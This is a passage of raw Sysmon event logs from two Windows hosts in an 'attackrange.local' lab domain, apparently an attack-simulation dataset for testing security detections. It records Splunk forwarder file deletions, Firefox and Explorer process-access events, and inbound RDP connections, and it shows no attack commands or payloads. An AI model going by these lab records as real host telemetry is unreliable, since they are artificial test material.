Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AED55A7873ECE563DD6B7D0A08566D32,SHA256=9A12D73E6DFCD1F8BED8E9C7FAFA8FF782935F1875CFCB25AC6EEF616EC61E03,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:05.740{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53427-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:07.633{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=180D04B8B411B972906ACE10ACC795D2,SHA256=D10395600B210AFD4E80D3853ADB110B6D38ECA795C02212DF8B0CE575E4F484,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979685Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:04.383{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62845-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979684Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:04.129{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62677-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979683Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:07.421{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=970D7A905A0A6E761641395164882BBF,SHA256=7A8415B2501B09E15D4B7486CF09D7744D77E033F447A2B536195DCC8A16CB4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979682Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:07.421{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B52347EDDEBCD35CD95A91113FC5CE9,SHA256=7EB84A2210D3AFD53BC1D68A939B00242770632FBAD22E59FB7793ACE2C9C185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979681Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:07.078{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC69CD4F64F0ADE1F18000E7C9D10936,SHA256=760C071C8A0183990FC49D2AA23B2B1C8C4E4C5E8CAC08D1D68133FA5585A3E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:08.669{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91BD727AD82004F54141D99926030AF4,SHA256=C98D8A069622DD8AFAB1EBA5308A88B31AB80544CCA273F9C771560A804E3053,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979686Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:08.093{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5609C213F6979E799C8FADAF2327BF8B,SHA256=C91507DA523ECD732CE13837632A8C37DD9B728C97F55E71EB4BB8458BAC2E0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:09.866{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7314618ECE8C430309AA335D71E468,SHA256=EBC6133E2A23620451062D74541D8DB0D1CA053143B4FD946034F530DCA40C82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979691Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:09.923{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=970D7A905A0A6E761641395164882BBF,SHA256=7A8415B2501B09E15D4B7486CF09D7744D77E033F447A2B536195DCC8A16CB4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979690Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:06.855{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de50418-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979689Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:06.687{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59435-false10.0.1.12-8000- 23542300x8000000000000000979688Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:09.863{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4312MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979687Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:09.109{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7428505115F2217AE083994CFB45150F,SHA256=82FC784374D1F3B552E46A07283CB6E6D03A4F105B5BD31E9082AB68715AAFF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:10.914{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:10.883{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8017C955312F88887CC54890D48F0BA1,SHA256=2AEAD0CBE3DCBA651FDA5F5E2F75C0D4DFCA088BC694FC212014898720C8C28A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979693Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:10.862{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4313MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979692Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:10.345{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D119D7E93AD47098B4188F60B0CFA61,SHA256=CD7F2270102710A2F70EAE21D77BF46730F28882D1D63CE30A86FAE23107591B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:11.898{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A88BA8D718490DC5EA7397B6D681B7B,SHA256=C4907641105FE7F77C29F932D5DFD4B4A46B0A869036AB0EDDAC5700D083910C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979694Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:11.580{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE20C7F099AAE03202C50E8CE130F31E,SHA256=DF34CE00651CA95C09E995DDF31758B84DCF55204381CA3A64F02A1326805EAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979696Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:12.643{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CE69090AF4E44EA95C72D59525EE66,SHA256=F3213CA4A4A6CD2339B559C44E2FD7FE86128D58740BBE8A5CDAD8A927776CBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979695Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:12.471{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E483468729A718451DB3630F0C7AC060,SHA256=5E41F42EAE2115176202A10B40223687A12963CD1C98301116200B705243B526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979699Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:13.768{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979698Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:13.690{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE5E90A670727E1EA15FFA74EB80E5A2,SHA256=0658E4BC78FB6C19076636235736937D7441809A8AFD83855CF3DE2F5BF7950D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.869{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\aborted-session-pingMD5=F779E567D4C214B60835304AEDE31138,SHA256=5EA8FE60ACE2BE295DA197F89377C8D6AE706A857C83B0DE498525287FE67A45,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.716{5EBD8912-79C0-6151-E577-00000000FC01}42966204C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.716{5EBD8912-79C0-6151-E577-00000000FC01}42966204C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.716{5EBD8912-79C0-6151-E577-00000000FC01}42966204C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.716{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.716{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.716{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.716{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.115{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A39EA8FE4358068F38504F1C34B44F8A,SHA256=4D0BC74BEA5EC41A0F0DEE3EFC7F927B1137307F849CE0E5F41A44B54F397793,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979697Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:09.768{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59787-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001051027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:10.874{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53428-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000979700Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:14.909{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=305FF0B16D9CAD2170E35B0D46CC8A18,SHA256=EA9775C7A97A740DCD8E9E220AB387F94767308BD7C42B0B19B3BC2BF9A8BE00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:14.684{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADF388A7F355FF9FD8FF2ED4A97CFB50,SHA256=1C597D9C546F6CE797F13888F23E4CF1B97CC0321EA7EA9A4844B5ACDC091C52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:14.684{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71A1CDD7BA294A404FA353C6F2DAE0AD,SHA256=9D8AA83C2BC537E85175AE842F3BAE3E995CD530EE3333FD516735DC6B8F429F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:14.116{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2F97FA14604B55C01E3A68E799C4191,SHA256=82C921E5FAC4D2D2B5D326CBE7F1FE29309C8101DE5AE52DFE4C45B5A0A31C16,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979702Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:12.393{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59437-false10.0.1.12-8089- 354300x8000000000000000979701Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:11.799{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59436-false10.0.1.12-8000- 23542300x80000000000000001051053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.400{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\pending_pings\13b7c391-9b94-40a0-9d5d-3a72ba90b983MD5=A8DC061B7E008F87AF1BF21365EBA604,SHA256=6E0F00641688CBE36BF363FA175C5592E02970950B410EFCD50248AF1497323A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.168{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.168{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=789C268F844246333A34973BF766809A,SHA256=A5D83D34C972AD43E56C74930EFBA17121B24A5B829D34DDB613332EF2572AE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.166{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=05221C2E180C7698206238EACEA2042A,SHA256=3E39D476B07F4DFBF3BD67C49E7450C638BB1E2BBAC192817A5C2A9FF0AF865D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.165{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=7EA456CF9D8849E5355ACD9620CE0E08,SHA256=83D72A81EEDC8E087A0ED3B2E3DB192AB3F6FF086B65930DD3D71A1DDC978DD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.147{5EBD8912-79C0-6151-E577-00000000FC01}42966204C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.147{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla 